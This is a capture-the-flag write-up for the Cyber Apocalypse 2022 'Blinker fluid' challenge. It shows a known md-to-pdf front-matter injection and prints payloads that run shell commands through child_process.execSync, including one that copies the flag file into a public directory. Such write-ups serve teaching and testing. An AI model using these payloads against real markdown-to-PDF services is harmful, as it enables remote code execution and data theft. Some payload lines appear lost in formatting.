Cyber Apocalypse 2022

Blinker fluid

Solved By : Bobbysox, Legend, Starrylord, thewhiteh4t

In blinker fluid challenge our markdown input gets converted into a PDF file available for download.

in the site source we checked package.json file :

        "name": "blinker-fluids",
        "version": "1.0.0",
        "description": "",
        "main": "index.js",
        "scripts": {
                "start": "node index.js"
        "keywords": [],
        "author": "rayhan0x01",
        "license": "ISC",
        "dependencies": {
                "express": "^4.17.3",
                "md-to-pdf": "^4.1.0",
                "nunjucks": "3.2.3",
                "sqlite-async": "1.1.3",
                "uuid": "8.3.2"
        "devDependencies": {
                "nodemon": "^1.19.1"

interesting things in this file are :

"md-to-pdf": "^4.1.0"
"nunjucks": "3.2.3"

we quickly found the following CVE for md-to-pdf :


payload as shown in the link :

---js\n((require("child_process")).execSync("id > /tmp/RCE.txt"))\n---RCE

the payload did not work for us as it is so we looked for more info on the same and found this :



so basically nunjucks was having issues with single line payload so we settled on the following :

((require("child_process")).execSync("cat ../flag.txt > static/invoices/rce.txt"))

line 1 and 3 needed to be exactly as above for it to work and we redirected flag to a file in invoices directory…

Published on : 21 May 2022